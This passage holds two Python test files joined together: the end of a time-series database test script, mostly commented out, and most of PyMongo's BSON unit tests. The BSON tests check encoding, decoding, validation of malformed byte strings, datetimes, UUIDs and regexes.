# t1 = TimeSeries([0,1,2],[4,5,6])
# t2 = TimeSeries([0,1,2],[5,5,5.5])
# t3 = TimeSeries([0,1,2],[6,7,8])
# client.add_trigger('stats', 'insert_ts', ['mean', 'std'], None)
# client.insert_ts('t1',t1)
# client.remove_trigger('stats', 'insert_ts')
# client.add_trigger('corr', 'upsert_meta', ['d-t3'], t3)
# client.upsert_meta('t1',{'order':2, 'blarg':1})
# client.insert_ts('t2', t2)
# client.upsert_meta('t2',{'order':1, 'blarg':0})
# _, res = client.select(fields = ['mean'])
# self.assertTrue('t1' in res)
# self.assertTrue('mean' not in res['t2'])
# client.remove_trigger('corr', 'upsert_meta')
# client.insert_ts('t3', t3)
# client.upsert_meta('t3',{'order':1, 'blarg':0})
# _, res = client.select(fields = ['d-t3'])
# self.assertTrue('d-t3' not in res['t3'])
# _, res = client.select(fields=['mean','std'])
# self.assertEqual(5,res['t1']['mean'])
# self.assertEqual(t1.std(),res['t1']['std'])
# with self.assertRaises(TypeError):
# client.insert_ts(t1)
# _, res = client.insert_ts('t1',t1)
# self.assertEqual(_,TSDBStatus.INVALID_KEY)
# _, res = client.augmented_select('corr',['distance'],arg=t3, metadata_dict={'order':{'<':3}, 'blarg':{'<=':1}})
# self.assertTrue(res['t1']['distance'] < 1e-10)
# self.assertTrue(res['t2']['distance'] > 1e-10)
# with self.assertRaises(ValueError):
# _, res = client.augmented_select('corr',['distance'], metadata_dict={'order':{'<':3}, 'blarg':{'<=':1}})
# t.terminate()
# t = multiprocessing.Process(target=server.run)
# t.start()
# time.sleep(0.5)
# tests(self,t)
# t.terminate()
suite = unittest.TestLoader().loadTestsFromModule(MyTest())
unittest.TextTestRunner().run(suite)
|
test_bson.py
|
# -*- coding: utf-8 -*-
#
# Copyright 2009-present MongoDB, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Test the bson module."""
import array
import collections
import datetime
import mmap
import os
import re
import sys
import tempfile
import uuid
import pickle
from collections import abc, OrderedDict
from io import BytesIO
sys.path[0:0] = [""]
import bson
from bson import (BSON,
decode,
decode_all,
decode_file_iter,
decode_iter,
encode,
EPOCH_AWARE,
is_valid,
Regex)
from bson.binary import Binary, UuidRepresentation
from bson.code import Code
from bson.codec_options import CodecOptions
from bson.int64 import Int64
from bson.objectid import ObjectId
from bson.dbref import DBRef
from bson.son import SON
from bson.timestamp import Timestamp
from bson.errors import (InvalidBSON,
InvalidDocument)
from bson.max_key import MaxKey
from bson.min_key import MinKey
from bson.tz_util import (FixedOffset,
utc)
from test import qcheck, unittest
from test.utils import ExceptionCatchingThread
class NotADict(abc.MutableMapping):
"""Non-dict type that implements the mapping protocol."""
def __init__(self, initial=None):
if not initial:
self._dict = {}
else:
self._dict = initial
def __iter__(self):
return iter(self._dict)
def __getitem__(self, item):
return self._dict[item]
def __delitem__(self, item):
del self._dict[item]
def __setitem__(self, item, value):
self._dict[item] = value
def __len__(self):
return len(self._dict)
def __eq__(self, other):
if isinstance(other, abc.Mapping):
return all(self.get(k) == other.get(k) for k in self)
return NotImplemented
def __repr__(self):
return "NotADict(%s)" % repr(self._dict)
class DSTAwareTimezone(datetime.tzinfo):
def __init__(self, offset, name, dst_start_month, dst_end_month):
self.__offset = offset
self.__dst_start_month = dst_start_month
self.__dst_end_month = dst_end_month
self.__name = name
def _is_dst(self, dt):
return self.__dst_start_month <= dt.month <= self.__dst_end_month
def utcoffset(self, dt):
return datetime.timedelta(minutes=self.__offset) + self.dst(dt)
def dst(self, dt):
if self._is_dst(dt):
return datetime.timedelta(hours=1)
return datetime.timedelta(0)
def tzname(self, dt):
return self.__name
class TestBSON(unittest.TestCase):
def assertInvalid(self, data):
self.assertRaises(InvalidBSON, decode, data)
def check_encode_then_decode(self, doc_class=dict, decoder=decode,
encoder=encode):
# Work around http://bugs.jython.org/issue1728
if sys.platform.startswith('java'):
doc_class = SON
def helper(doc):
self.assertEqual(doc, (decoder(encoder(doc_class(doc)))))
self.assertEqual(doc, decoder(encoder(doc)))
helper({})
helper({"test": "hello"})
self.assertTrue(isinstance(decoder(encoder(
{"hello": "world"}))["hello"], str))
helper({"mike": -10120})
helper({"long": Int64(10)})
helper({"really big long": 2147483648})
helper({"hello": 0.0013109})
helper({"something": True})
helper({"false": False})
helper({"an array": [1, True, 3.8, "world"]})
helper({"an object": doc_class({"test": "something"})})
helper({"a binary": Binary(b"test", 100)})
helper({"a binary": Binary(b"test", 128)})
helper({"a binary": Binary(b"test", 254)})
helper({"another binary": Binary(b"test", 2)})
helper(SON([('test dst', datetime.datetime(1993, 4, 4, 2))]))
helper(SON([('test negative dst',
datetime.datetime(1, 1, 1, 1, 1, 1))]))
helper({"big float": float(10000000000)})
helper({"ref": DBRef("coll", 5)})
helper({"ref": DBRef("coll", 5, foo="bar", bar=4)})
helper({"ref": DBRef("coll", 5, "foo")})
helper({"ref": DBRef("coll", 5, "foo", foo="bar")})
helper({"ref": Timestamp(1, 2)})
helper({"foo": MinKey()})
helper({"foo": MaxKey()})
helper({"$field": Code("function(){ return true; }")})
helper({"$field": Code("return function(){ return x; }", scope={'x': False})})
def encode_then_decode(doc):
return doc_class(doc) == decoder(encode(doc), CodecOptions(
document_class=doc_class))
qcheck.check_unittest(self, encode_then_decode,
qcheck.gen_mongo_dict(3))
def test_encode_then_decode(self):
self.check_encode_then_decode()
def test_encode_then_decode_any_mapping(self):
self.check_encode_then_decode(doc_class=NotADict)
def test_encode_then_decode_legacy(self):
self.check_encode_then_decode(
encoder=BSON.encode,
decoder=lambda *args: BSON(args[0]).decode(*args[1:]))
def test_encode_then_decode_any_mapping_legacy(self):
self.check_encode_then_decode(
doc_class=NotADict, encoder=BSON.encode,
decoder=lambda *args: BSON(args[0]).decode(*args[1:]))
def test_encoding_defaultdict(self):
dct = collections.defaultdict(dict, [('foo', 'bar')])
encode(dct)
self.assertEqual(dct, collections.defaultdict(dict, [('foo', 'bar')]))
def test_basic_validation(self):
self.assertRaises(TypeError, is_valid, 100)
self.assertRaises(TypeError, is_valid, "test")
self.assertRaises(TypeError, is_valid, 10.4)
self.assertInvalid(b"test")
# the simplest valid BSON document
self.assertTrue(is_valid(b"\x05\x00\x00\x00\x00"))
self.assertTrue(is_valid(BSON(b"\x05\x00\x00\x00\x00")))
# failure cases
self.assertInvalid(b"\x04\x00\x00\x00\x00")
self.assertInvalid(b"\x05\x00\x00\x00\x01")
self.assertInvalid(b"\x05\x00\x00\x00")
self.assertInvalid(b"\x05\x00\x00\x00\x00\x00")
self.assertInvalid(b"\x07\x00\x00\x00\x02a\x00\x78\x56\x34\x12")
self.assertInvalid(b"\x09\x00\x00\x00\x10a\x00\x05\x00")
self.assertInvalid(b"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00")
self.assertInvalid(b"\x13\x00\x00\x00\x02foo\x00"
b"\x04\x00\x00\x00bar\x00\x00")
self.assertInvalid(b"\x18\x00\x00\x00\x03foo\x00\x0f\x00\x00"
b"\x00\x10bar\x00\xff\xff\xff\x7f\x00\x00")
self.assertInvalid(b"\x15\x00\x00\x00\x03foo\x00\x0c"
b"\x00\x00\x00\x08bar\x00\x01\x00\x00")
self.assertInvalid(b"\x1c\x00\x00\x00\x03foo\x00"
b"\x12\x00\x00\x00\x02bar\x00"
b"\x05\x00\x00\x00baz\x00\x00\x00")
self.assertInvalid(b"\x10\x00\x00\x00\x02a\x00"
b"\x04\x00\x00\x00abc\xff\x00")
def test_bad_string_lengths(self):
self.assertInvalid(
b"\x0c\x00\x00\x00\x02\x00"
b"\x00\x00\x00\x00\x00\x00")
self.assertInvalid(
b"\x12\x00\x00\x00\x02\x00"
b"\xff\xff\xff\xfffoobar\x00\x00")
self.assertInvalid(
b"\x0c\x00\x00\x00\x0e\x00"
b"\x00\x00\x00\x00\x00\x00")
self.assertInvalid(
b"\x12\x00\x00\x00\x0e\x00"
b"\xff\xff\xff\xfffoobar\x00\x00")
self.assertInvalid(
b"\x18\x00\x00\x00\x0c\x00"
b"\x00\x00\x00\x00\x00RY\xb5j"
b"\xfa[\xd8A\xd6X]\x99\x00")
self.assertInvalid(
b"\x1e\x00\x00\x00\x0c\x00"
b"\xff\xff\xff\xfffoobar\x00"
b"RY\xb5j\xfa[\xd8A\xd6X]\x99\x00")
self.assertInvalid(
b"\x0c\x00\x00\x00\r\x00"
b"\x00\x00\x00\x00\x00\x00")
self.assertInvalid(
b"\x0c\x00\x00\x00\r\x00"
b"\xff\xff\xff\xff\x00\x00")
self.assertInvalid(
b"\x1c\x00\x00\x00\x0f\x00"
b"\x15\x00\x00\x00\x00\x00"
b"\x00\x00\x00\x0c\x00\x00"
b"\x00\x02\x00\x01\x00\x00"
b"\x00\x00\x00\x00")
self.assertInvalid(
b"\x1c\x00\x00\x00\x0f\x00"
b"\x15\x00\x00\x00\xff\xff"
b"\xff\xff\x00\x0c\x00\x00"
b"\x00\x02\x00\x01\x00\x00"
b"\x00\x00\x00\x00")
self.assertInvalid(
b"\x1c\x00\x00\x00\x0f\x00"
b"\x15\x00\x00\x00\x01\x00"
b"\x00\x00\x00\x0c\x00\x00"
b"\x00\x02\x00\x00\x00\x00"
b"\x00\x00\x00\x00")
self.assertInvalid(
b"\x1c\x00\x00\x00\x0f\x00"
b"\x15\x00\x00\x00\x01\x00"
b"\x00\x00\x00\x0c\x00\x00"
b"\x00\x02\x00\xff\xff\xff"
b"\xff\x00\x00\x00")
def test_random_data_is_not_bson(self):
qcheck.check_unittest(self, qcheck.isnt(is_valid),
qcheck.gen_string(qcheck.gen_range(0, 40)))
def test_basic_decode(self):
self.assertEqual({"test": "hello world"},
decode(b"\x1B\x00\x00\x00\x0E\x74\x65\x73\x74\x00\x0C"
b"\x00\x00\x00\x68\x65\x6C\x6C\x6F\x20\x77\x6F"
b"\x72\x6C\x64\x00\x00"))
self.assertEqual([{"test": "hello world"}, {}],
decode_all(b"\x1B\x00\x00\x00\x0E\x74\x65\x73\x74"
b"\x00\x0C\x00\x00\x00\x68\x65\x6C\x6C"
b"\x6f\x20\x77\x6F\x72\x6C\x64\x00\x00"
b"\x05\x00\x00\x00\x00"))
self.assertEqual([{"test": "hello world"}, {}],
list(decode_iter(
b"\x1B\x00\x00\x00\x0E\x74\x65\x73\x74"
b"\x00\x0C\x00\x00\x00\x68\x65\x6C\x6C"
b"\x6f\x20\x77\x6F\x72\x6C\x64\x00\x00"
b"\x05\x00\x00\x00\x00")))
self.assertEqual([{"test": "hello world"}, {}],
list(decode_file_iter(BytesIO(
b"\x1B\x00\x00\x00\x0E\x74\x65\x73\x74"
b"\x00\x0C\x00\x00\x00\x68\x65\x6C\x6C"
b"\x6f\x20\x77\x6F\x72\x6C\x64\x00\x00"
b"\x05\x00\x00\x00\x00"))))
def test_decode_all_buffer_protocol(self):
docs = [{'foo': 'bar'}, {}]
bs = b"".join(map(encode, docs))
self.assertEqual(docs, decode_all(bytearray(bs)))
self.assertEqual(docs, decode_all(memoryview(bs)))
self.assertEqual(docs, decode_all(memoryview(b'1' + bs + b'1')[1:-1]))
self.assertEqual(docs, decode_all(array.array('B', bs)))
with mmap.mmap(-1, len(bs)) as mm:
mm.write(bs)
mm.seek(0)
self.assertEqual(docs, decode_all(mm))
def test_decode_buffer_protocol(self):
doc = {'foo': 'bar'}
bs = encode(doc)
self.assertEqual(doc, decode(bs))
self.assertEqual(doc, decode(bytearray(bs)))
self.assertEqual(doc, decode(memoryview(bs)))
self.assertEqual(doc, decode(memoryview(b'1' + bs + b'1')[1:-1]))
self.assertEqual(doc, decode(array.array('B', bs)))
with mmap.mmap(-1, len(bs)) as mm:
mm.write(bs)
mm.seek(0)
self.assertEqual(doc, decode(mm))
def test_invalid_decodes(self):
# Invalid object size (not enough bytes in document for even
# an object size of first object.
# NOTE: decode_all and decode_iter don't care, not sure if they should?
self.assertRaises(InvalidBSON, list,
decode_file_iter(BytesIO(b"\x1B")))
bad_bsons = [
# An object size that's too small to even include the object size,
# but is correctly encoded, along with a correct EOO (and no data).
b"\x01\x00\x00\x00\x00",
# One object, but with object size listed smaller than it is in the
# data.
(b"\x1A\x00\x00\x00\x0E\x74\x65\x73\x74"
b"\x00\x0C\x00\x00\x00\x68\x65\x6C\x6C"
b"\x6f\x20\x77\x6F\x72\x6C\x64\x00\x00"
b"\x05\x00\x00\x00\x00"),
# One object, missing the EOO at the end.
(b"\x1B\x00\x00\x00\x0E\x74\x65\x73\x74"
b"\x00\x0C\x00\x00\x00\x68\x65\x6C\x6C"
b"\x6f\x20\x77\x6F\x72\x6C\x64\x00\x00"
b"\x05\x00\x00\x00"),
# One object, sized correctly, with a spot for an EOO, but the EOO
# isn't 0x00.
(b"\x1B\x00\x00\x00\x0E\x74\x65\x73\x74"
b"\x00\x0C\x00\x00\x00\x68\x65\x6C\x6C"
b"\x6f\x20\x77\x6F\x72\x6C\x64\x00\x00"
b"\x05\x00\x00\x00\xFF"),
]
for i, data in enumerate(bad_bsons):
msg = "bad_bson[{}]".format(i)
with self.assertRaises(InvalidBSON, msg=msg):
decode_all(data)
with self.assertRaises(InvalidBSON, msg=msg):
list(decode_iter(data))
with self.assertRaises(InvalidBSON, msg=msg):
list(decode_file_iter(BytesIO(data)))
with tempfile.TemporaryFile() as scratch:
scratch.write(data)
scratch.seek(0, os.SEEK_SET)
with self.assertRaises(InvalidBSON, msg=msg):
list(decode_file_iter(scratch))
def test_invalid_field_name(self):
# Decode a truncated field
with self.assertRaises(InvalidBSON) as ctx:
decode(b'\x0b\x00\x00\x00\x02field\x00')
# Assert that the InvalidBSON error message is not empty.
self.assertTrue(str(ctx.exception))
def test_data_timestamp(self):
self.assertEqual({"test": Timestamp(4, 20)},
decode(b"\x13\x00\x00\x00\x11\x74\x65\x73\x74\x00\x14"
b"\x00\x00\x00\x04\x00\x00\x00\x00"))
def test_basic_encode(self):
self.assertRaises(TypeError, encode, 100)
self.assertRaises(TypeError, encode, "hello")
self.assertRaises(TypeError, encode, None)
self.assertRaises(TypeError, encode, [])
self.assertEqual(encode({}), BSON(b"\x05\x00\x00\x00\x00"))
self.assertEqual(encode({}), b"\x05\x00\x00\x00\x00")
self.assertEqual(encode({"test": "hello world"}),
b"\x1B\x00\x00\x00\x02\x74\x65\x73\x74\x00\x0C\x00"
b"\x00\x00\x68\x65\x6C\x6C\x6F\x20\x77\x6F\x72\x6C"
b"\x64\x00\x00")
self.assertEqual(encode({"mike": 100}),
b"\x0F\x00\x00\x00\x10\x6D\x69\x6B\x65\x00\x64\x00"
b"\x00\x00\x00")
self.assertEqual(encode({"hello": 1.5}),
b"\x14\x00\x00\x00\x01\x68\x65\x6C\x6C\x6F\x00\x00"
b"\x00\x00\x00\x00\x00\xF8\x3F\x00")
self.assertEqual(encode({"true": True}),
b"\x0C\x00\x00\x00\x08\x74\x72\x75\x65\x00\x01\x00")
self.assertEqual(encode({"false": False}),
b"\x0D\x00\x00\x00\x08\x66\x61\x6C\x73\x65\x00\x00"
b"\x00")
self.assertEqual(encode({"empty": []}),
b"\x11\x00\x00\x00\x04\x65\x6D\x70\x74\x79\x00\x05"
b"\x00\x00\x00\x00\x00")
self.assertEqual(encode({"none": {}}),
b"\x10\x00\x00\x00\x03\x6E\x6F\x6E\x65\x00\x05\x00"
b"\x00\x00\x00\x00")
self.assertEqual(encode({"test": Binary(b"test", 0)}),
b"\x14\x00\x00\x00\x05\x74\x65\x73\x74\x00\x04\x00"
b"\x00\x00\x00\x74\x65\x73\x74\x00")
self.assertEqual(encode({"test": Binary(b"test", 2)}),
b"\x18\x00\x00\x00\x05\x74\x65\x73\x74\x00\x08\x00"
b"\x00\x00\x02\x04\x00\x00\x00\x74\x65\x73\x74\x00")
self.assertEqual(encode({"test": Binary(b"test", 128)}),
b"\x14\x00\x00\x00\x05\x74\x65\x73\x74\x00\x04\x00"
b"\x00\x00\x80\x74\x65\x73\x74\x00")
self.assertEqual(encode({"test": None}),
b"\x0B\x00\x00\x00\x0A\x74\x65\x73\x74\x00\x00")
self.assertEqual(encode({"date": datetime.datetime(2007, 1, 8,
0, 30, 11)}),
b"\x13\x00\x00\x00\x09\x64\x61\x74\x65\x00\x38\xBE"
b"\x1C\xFF\x0F\x01\x00\x00\x00")
self.assertEqual(encode({"regex": re.compile(b"a*b",
re.IGNORECASE)}),
b"\x12\x00\x00\x00\x0B\x72\x65\x67\x65\x78\x00\x61"
b"\x2A\x62\x00\x69\x00\x00")
self.assertEqual(encode({"$where": Code("test")}),
b"\x16\x00\x00\x00\r$where\x00\x05\x00\x00\x00test"
b"\x00\x00")
self.assertEqual(encode({"$field":
Code("function(){ return true;}", scope=None)}),
b"+\x00\x00\x00\r$field\x00\x1a\x00\x00\x00"
b"function(){ return true;}\x00\x00")
self.assertEqual(encode({"$field":
Code("return function(){ return x; }",
scope={'x': False})}),
b"=\x00\x00\x00\x0f$field\x000\x00\x00\x00\x1f\x00"
b"\x00\x00return function(){ return x; }\x00\t\x00"
b"\x00\x00\x08x\x00\x00\x00\x00")
unicode_empty_scope = Code("function(){ return 'héllo';}", {})
self.assertEqual(encode({'$field': unicode_empty_scope}),
b"8\x00\x00\x00\x0f$field\x00+\x00\x00\x00\x1e\x00"
b"\x00\x00function(){ return 'h\xc3\xa9llo';}\x00\x05"
b"\x00\x00\x00\x00\x00")
a = ObjectId(b"\x00\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0A\x0B")
self.assertEqual(encode({"oid": a}),
b"\x16\x00\x00\x00\x07\x6F\x69\x64\x00\x00\x01\x02"
b"\x03\x04\x05\x06\x07\x08\x09\x0A\x0B\x00")
self.assertEqual(encode({"ref": DBRef("coll", a)}),
b"\x2F\x00\x00\x00\x03ref\x00\x25\x00\x00\x00\x02"
b"$ref\x00\x05\x00\x00\x00coll\x00\x07$id\x00\x00"
b"\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0A\x0B\x00"
b"\x00")
def test_unknown_type(self):
# Repr value differs with major python version
part = "type %r for fieldname 'foo'" % (b'\x14',)
docs = [
b'\x0e\x00\x00\x00\x14foo\x00\x01\x00\x00\x00\x00',
(b'\x16\x00\x00\x00\x04foo\x00\x0c\x00\x00\x00\x140'
b'\x00\x01\x00\x00\x00\x00\x00'),
(b' \x00\x00\x00\x04bar\x00\x16\x00\x00\x00\x030\x00\x0e\x00\x00'
b'\x00\x14foo\x00\x01\x00\x00\x00\x00\x00\x00')]
for bs in docs:
try:
decode(bs)
except Exception as exc:
self.assertTrue(isinstance(exc, InvalidBSON))
self.assertTrue(part in str(exc))
else:
self.fail("Failed to raise an exception.")
def test_dbpointer(self):
# *Note* - DBPointer and DBRef are *not* the same thing. DBPointer
# is a deprecated BSON type. DBRef is a convention that does not
# exist in the BSON spec, meant to replace DBPointer. PyMongo does
# not support creation of the DBPointer type, but will decode
# DBPointer to DBRef.
bs = (b"\x18\x00\x00\x00\x0c\x00\x01\x00\x00"
b"\x00\x00RY\xb5j\xfa[\xd8A\xd6X]\x99\x00")
self.assertEqual({'': DBRef('', ObjectId('5259b56afa5bd841d6585d99'))},
decode(bs))
def test_bad_dbref(self):
ref_only = {'ref': {'$ref': 'collection'}}
id_only = {'ref': {'$id': ObjectId()}}
self.assertEqual(ref_only, decode(encode(ref_only)))
self.assertEqual(id_only, decode(encode(id_only)))
def test_bytes_as_keys(self):
doc = {b"foo": 'bar'}
# Since `bytes` are stored as Binary you can't use them
# as keys in python 3.x. Using binary data as a key makes
# no sense in BSON anyway and little sense in python.
self.assertRaises(InvalidDocument, encode, doc)
def test_datetime_encode_decode(self):
# Negative timestamps
dt1 = datetime.datetime(1, 1, 1, 1, 1, 1, 111000)
dt2 = decode(encode({"date": dt1}))["date"]
self.assertEqual(dt1, dt2)
dt1 = datetime.datetime(1959, 6, 25, 12, 16, 59, 999000)
dt2 = decode(encode({"date": dt1}))["date"]
self.assertEqual(dt1, dt2)
# Positive timestamps
dt1 = datetime.datetime(9999, 12, 31, 23, 59, 59, 999000)
dt2 = decode(encode({"date": dt1}))["date"]
self.assertEqual(dt1, dt2)
dt1 = datetime.datetime(2011, 6, 14, 10, 47, 53, 444000)
dt2 = decode(encode({"date": dt1}))["date"]
self.assertEqual(dt1, dt2)
def test_large_datetime_truncation(self):
# Ensure that a large datetime is truncated correctly.
dt1 = datetime.datetime(9999, 1, 1, 1, 1, 1, 999999)
dt2 = decode(encode({"date": dt1}))["date"]
self.assertEqual(dt2.microsecond, 999000)
self.assertEqual(dt2.second, dt1.second)
def test_aware_datetime(self):
aware = datetime.datetime(1993, 4, 4, 2,
tzinfo=FixedOffset(555, "SomeZone"))
as_utc = (aware - aware.utcoffset()).replace(tzinfo=utc)
self.assertEqual(datetime.datetime(1993, 4, 3, 16, 45, tzinfo=utc),
as_utc)
after = decode(encode({"date": aware}), CodecOptions(tz_aware=True))[
"date"]
self.assertEqual(utc, after.tzinfo)
self.assertEqual(as_utc, after)
def test_local_datetime(self):
# Timezone -60 minutes of UTC, with DST between April and July.
tz = DSTAwareTimezone(60, "sixty-minutes", 4, 7)
# It's not DST.
local = datetime.datetime(year=2025, month=12, hour=2, day=1,
tzinfo=tz)
options = CodecOptions(tz_aware=True, tzinfo=tz)
# Encode with this timezone, then decode to UTC.
encoded = encode({'date': local}, codec_options=options)
self.assertEqual(local.replace(hour=1, tzinfo=None),
decode(encoded)['date'])
# It's DST.
local = datetime.datetime(year=2025, month=4, hour=1, day=1,
tzinfo=tz)
encoded = encode({'date': local}, codec_options=options)
self.assertEqual(local.replace(month=3, day=31, hour=23, tzinfo=None),
decode(encoded)['date'])
# Encode UTC, then decode in a different timezone.
encoded = encode({'date': local.replace(tzinfo=utc)})
decoded = decode(encoded, options)['date']
self.assertEqual(local.replace(hour=3), decoded)
self.assertEqual(tz, decoded.tzinfo)
# Test round-tripping.
self.assertEqual(
local, decode(encode(
{'date': local}, codec_options=options), options)['date'])
# Test around the Unix Epoch.
epochs = (
EPOCH_AWARE,
EPOCH_AWARE.astimezone(FixedOffset(120, 'one twenty')),
EPOCH_AWARE.astimezone(FixedOffset(-120, 'minus one twenty'))
)
utc_co = CodecOptions(tz_aware=True)
for epoch in epochs:
doc = {'epoch': epoch}
# We always retrieve datetimes in UTC unless told to do otherwise.
self.assertEqual(
EPOCH_AWARE,
decode(encode(doc), codec_options=utc_co)['epoch'])
# Round-trip the epoch.
local_co = CodecOptions(tz_aware=True, tzinfo=epoch.tzinfo)
self.assertEqual(
epoch,
decode(encode(doc), codec_options=local_co)['epoch'])
def test_naive_decode(self):
aware = datetime.datetime(1993, 4, 4, 2,
tzinfo=FixedOffset(555, "SomeZone"))
naive_utc = (aware - aware.utcoffset()).replace(tzinfo=None)
self.assertEqual(datetime.datetime(1993, 4, 3, 16, 45), naive_utc)
after = decode(encode({"date": aware}))["date"]
self.assertEqual(None, after.tzinfo)
self.assertEqual(naive_utc, after)
def test_dst(self):
d = {"x": datetime.datetime(1993, 4, 4, 2)}
self.assertEqual(d, decode(encode(d)))
@unittest.skip('Disabled due to http://bugs.python.org/issue25222')
def test_bad_encode(self):
evil_list = {'a': []}
evil_list['a'].append(evil_list)
evil_dict = {}
evil_dict['a'] = evil_dict
for evil_data in [evil_dict, evil_list]:
self.assertRaises(Exception, encode, evil_data)
def test_overflow(self):
self.assertTrue(encode({"x": 9223372036854775807}))
self.assertRaises(OverflowError, encode,
{"x": 9223372036854775808})
self.assertTrue(encode({"x": -9223372036854775808}))
self.assertRaises(OverflowError, encode,
{"x": -9223372036854775809})
def test_small_long_encode_decode(self):
encoded1 = encode({'x': 256})
decoded1 = decode(encoded1)['x']
self.assertEqual(256, decoded1)
self.assertEqual(type(256), type(decoded1))
encoded2 = encode({'x': Int64(256)})
decoded2 = decode(encoded2)['x']
expected = Int64(256)
self.assertEqual(expected, decoded2)
self.assertEqual(type(expected), type(decoded2))
self.assertNotEqual(type(decoded1), type(decoded2))
def test_tuple(self):
self.assertEqual({"tuple": [1, 2]},
decode(encode({"tuple": (1, 2)})))
def test_uuid(self):
id = uuid.uuid4()
# The default uuid_representation is UNSPECIFIED
with self.assertRaisesRegex(ValueError, 'cannot encode native uuid'):
bson.decode_all(encode({'uuid': id}))
opts = CodecOptions(uuid_representation=UuidRepresentation.STANDARD)
transformed_id = decode(encode({"id": id}, codec_options=opts),
codec_options=opts)["id"]
self.assertTrue(isinstance(transformed_id, uuid.UUID))
self.assertEqual(id, transformed_id)
self.assertNotEqual(uuid.uuid4(), transformed_id)
def test_uuid_legacy(self):
id = uuid.uuid4()
legacy = Binary.from_uuid(id, UuidRepresentation.PYTHON_LEGACY)
self.assertEqual(3, legacy.subtype)
bin = decode(encode({"uuid": legacy}))["uuid"]
self.assertTrue(isinstance(bin, Binary))
transformed = bin.as_uuid(UuidRepresentation.PYTHON_LEGACY)
self.assertEqual(id, transformed)
# The C extension was segfaulting on unicode RegExs, so we have this test
# that doesn't really test anything but the lack of a segfault.
def test_unicode_regex(self):
regex = re.compile('revisi\xf3n')
decode(encode({"regex": regex}))
def test_non_string_keys(self):
self.assertRaises(InvalidDocument, encode, {8.9: "test"})
def test_utf8(self):
w = {"aéあ": "aéあ"}
self.assertEqual(w, decode(encode(w)))
# b'a\xe9' == "aé".encode("iso-8859-1")
iso8859_bytes = b'a\xe9'
y = {"hello": iso8859_bytes}
# Stored as BSON binary subtype 0.
out = decode(encode(y))
self.assertTrue(isinstance(out['hello'], bytes))
self.assertEqual(out['hello'], iso8859_bytes)
def test_null_character(self):
doc = {"a": "\x00"}
self.assertEqual(doc, decode(encode(doc)))
doc = {"a": "\x00"}
self.assertEqual(doc, decode(encode(doc)))
self.assertRaises(InvalidDocument, encode, {b"\x00": "a"})
self.assertRaises(InvalidDocument, encode, {"\x00": "a"})
self.assertRaises(InvalidDocument, encode,
{"a": re.compile(b"ab\x00c")})
self.assertRaises(InvalidDocument, encode,
{"a": re.compile("ab\x00c")})
def test_move_id(self):
self.assertEqual(b"\x19\x00\x00\x00\x02_id\x00\x02\x00\x00\x00a\x00"
b"\x02a\x00\x02\x00\x00\x00a\x00\x00",
encode(SON([("a", "a"), ("_id", "a")])))
self.assertEqual(b"\x2c\x00\x00\x00"
b"\x02_id\x00\x02\x00\x00\x00b\x00"
b"\x03b\x00"
b"\x19\x00\x00\x00\x02a\x00\x02\x00\x00\x00a\x00"
b"\x02_id\x00\x02\x00\x00\x00a\x00\x00\x00",
encode(SON([("b",
SON([("a", "a"), ("_id", "a")])),
("_id", "b")])))
def test_dates(self):
doc = {"early": datetime.datetime(1686, 5, 5),
"late": datetime.datetime(2086, 5, 5)}
try:
self.assertEqual(doc, decode(encode(doc)))
except ValueError:
# Ignore ValueError when no C ext, since it's probably
# a problem w/ 32-bit Python - we work around this in the
# C ext, though.
if bson.has_c():
raise
def test_custom_class(self):
self.assertIsInstance(decode(encode({})), dict)
self.assertNotIsInstance(decode(encode({})), SON)
self.assertIsInstance(
decode(encode({}), CodecOptions(document_class=SON)), SON)
self.assertEqual(
1, decode(encode({"x": 1}), CodecOptions(document_class=SON))["x"])
x = encode({"x": [{"y": 1}]})
self.assertIsInstance(
decode(x, CodecOptions(document_class=SON))["x"][0], SON)
def test_subclasses(self):
# make sure we can serialize subclasses of native Python types.
class _myint(int):
pass
class _myfloat(float):
pass
class _myunicode(str):
pass
d = {'a': _myint(42), 'b': _myfloat(63.9),
'c': _myunicode('hello world')
}
d2 = decode(encode(d))
for key, value in d2.items():
orig_value = d[key]
orig_type = orig_value.__class__.__bases__[0]
self.assertEqual(type(value), orig_type)
self.assertEqual(value, orig_type(value))
def test_ordered_dict(self):
d = OrderedDict([("one", 1), ("two", 2), ("three", 3), ("four", 4)])
self.assertEqual(
d, decode(encode(d), CodecOptions(document_class=OrderedDict)))
def test_bson_regex(self):
# Invalid Python regex, though valid PCRE.
bson_re1 = Regex(r'[\w-\.]')
self.assertEqual(r'[\w-\.]', bson_re1.pattern)
self.assertEqual(0, bson_re1.flags)
doc1 = {'r': bson_re1}
doc1_bson = (
b'\x11\x00\x00\x00' # document length
b'\x0br\x00[\\w-\\.]\x00\x00' # r: regex
b'\x00') # document terminator
self.assertEqual(doc1_bson, encode(doc1))
self.assertEqual(doc1, decode(doc1_bson))
# Valid Python regex, with flags.
re2 = re.compile('.*', re.I | re.M | re.S | re.U | re.X)
bson_re2 = Regex('.*', re.I | re.M | re.S | re.U | re.X)
doc2_with_re = {'r': re2}
doc2_with_bson_re = {'r': bson_re2}
doc2_bson = (
b"\x11\x00\x00\x00" # document length
b"\x0br\x00.*\x00imsux\x00" # r: regex
b"\x00") # document terminator
self.assertEqual(doc2_bson, encode(doc2_with_re))
self.assertEqual(doc2_bson, encode(doc2_with_bson_re))
self.assertEqual(re2.pattern, decode(doc2_bson)['r'].pattern)
self.assertEqual(re2.flags, decode(doc2_bson)['r'].flags)
def test_regex_from_native(self):
self.assertEqual('.*', Regex.from_native(re.compile('.*')).pattern)
self.assertEqual(0, Regex.from_native(re.compile(b'')).flags)
regex = re.compile(b'', re.I | re.L | re.M | re.S | re.X)
self.assertEqual(
re.I | re.L | re.M | re.S | re.X,
Regex.from_native(regex).flags)
unicode_regex = re.compile('', re.U)
self.assertEqual(re.U, Regex.from_native(unicode_regex).flags)
def test_regex_hash(self):
self.assertRaises(TypeError, hash, Regex('hello'))
def test_regex_comparison(self):
re1 = Regex('a')
re2 = Regex('b')
self.assertNotEqual(re1, re2)
re1 = Regex('a', re.I)
re2 = Regex('a', re.M)
